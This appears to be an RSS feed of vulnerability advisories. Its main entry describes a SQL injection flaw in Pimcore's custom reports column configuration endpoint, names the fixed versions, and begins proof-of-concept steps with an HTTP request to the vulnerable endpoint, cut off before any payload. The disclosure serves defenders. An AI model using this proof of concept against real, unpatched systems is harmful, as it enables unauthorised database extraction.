<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 10:02:19 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-338595</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-338595</link>
      <description>EUVD-2026-338595</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-338595</guid>
    </item>
    <item>
      <title>fkie_cve-2026-44739</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-44739</link>
      <description>&lt;p&gt;Pimcore is an Open Source Data &amp;amp; Experience Management Platform. Prior to 11.5.17 (LTS) and 12.3.6, the columnConfigAction endpoint in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php passes malicious SQL configuration through CustomReportController:columnConfigAction, SqlAdapter::getColumns, SqlAdapter::buildQueryString, and Db::fetchAssociative(), allowing an attacker with the reports_config permission to use arbitrary SELECT queries, UNION statements, dangerous database functions, and error-based SQL injection to exfiltrate or manipulate database data. This issue is fixed in versions 11.5.17 (LTS) and 12.3.6.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Pimcore is an Open Source Data &amp;amp; Experience Management Platform. Prior to 11.5.17 (LTS) and 12.3.6, the columnConfigAction endpoint in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php passes malicious SQL configuration through CustomReportController:columnConfigAction, SqlAdapter::getColumns, SqlAdapter::buildQueryString, and Db::fetchAssociative(), allowing an attacker with the reports_config permission to use arbitrary SELECT queries, UNION statements, dangerous database functions, and error-based SQL injection to exfiltrate or manipulate database data. This issue is fixed in versions 11.5.17 (LTS) and 12.3.6.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-44739</guid>
    </item>
    <item>
      <title>GHSA-3234-gxc3-pq6f — Pimcore Vulnerable to SQL Injection in Custom Reports Column Configuration</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-3234-gxc3-pq6f</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: pimcore/pimcore&lt;/p&gt;
&lt;p&gt;### Summary
The columnConfigAction endpoint in the CustomReportsBundle is vulnerable to SQL injection. An attacker with the reports_config permission can supply a malicious SQL configuration that is concatenated into a query and executed. Although the application attempts to filter certain DDL/DML keywords (like UPDATE, DELETE, DROP), it fails to prevent arbitrary SELECT queries, UNION statements, or the use of dangerous database functions. Furthermore, because the application returns database error messages in the JSON response, an attacker can easily exfiltrate data using error-based SQL injection techniques.
### Affected scope
bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php
CustomReportController:columnConfigAction -&amp;gt; SqlAdapter::getColumns -&amp;gt; SqlAdapter::buildQueryString -&amp;gt; Db::fetchAssociative()&lt;/p&gt;
&lt;p&gt;### PoC
* Download and install the version Pimcore &amp;lt;=12.3.3 (latest)
* Login using Admin account or any account that has reports_config permission
* Navigate to custom reports
* Capture the request using burp suite and perform SQLi attack as the following 
1. Get Database username
```
POST /admin/bundle/customreports/custom-report/column-config HTTP/1.1
Host: localhost
Content-Length: 310
sec-ch-ua-platform: &amp;#34;Linux&amp;#34;
Accept-Language: en-US,en;q=0.9
sec-ch-ua: &amp;#34;Not_A Brand&amp;#34;;v=&amp;#34;99&amp;#34;, &amp;#34;Chromium&amp;#34;;v=&amp;#34;142&amp;#34;
sec-ch-ua-mobile: ?0
X-pimcore-extjs-version-minor: 0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: pimcore/pimcore&lt;/p&gt;
&lt;p&gt;### Summary
The columnConfigAction endpoint in the CustomReportsBundle is vulnerable to SQL injection. An attacker with the reports_config permission can supply a malicious SQL configuration that is concatenated into a query and executed. Although the application attempts to filter certain DDL/DML keywords (like UPDATE, DELETE, DROP), it fails to prevent arbitrary SELECT queries, UNION statements, or the use of dangerous database functions. Furthermore, because the application returns database error messages in the JSON response, an attacker can easily exfiltrate data using error-based SQL injection techniques.
### Affected scope
bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php
CustomReportController:columnConfigAction -&amp;gt; SqlAdapter::getColumns -&amp;gt; SqlAdapter::buildQueryString -&amp;gt; Db::fetchAssociative()&lt;/p&gt;
&lt;p&gt;### PoC
* Download and install the version Pimcore &amp;lt;=12.3.3 (latest)
* Login using Admin account or any account that has reports_config permission
* Navigate to custom reports
* Capture the request using burp suite and perform SQLi attack as the following 
1. Get Database username
```
POST /admin/bundle/customreports/custom-report/column-config HTTP/1.1
Host: localhost
Content-Length: 310
sec-ch-ua-platform: &amp;#34;Linux&amp;#34;
Accept-Language: en-US,en;q=0.9
sec-ch-ua: &amp;#34;Not_A Brand&amp;#34;;v=&amp;#34;99&amp;#34;, &amp;#34;Chromium&amp;#34;;v=&amp;#34;142&amp;#34;
sec-ch-ua-mobile: ?0
X-pimcore-extjs-version-minor: 0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-3234-gxc3-pq6f</guid>
    </item>
  </channel>
</rss>
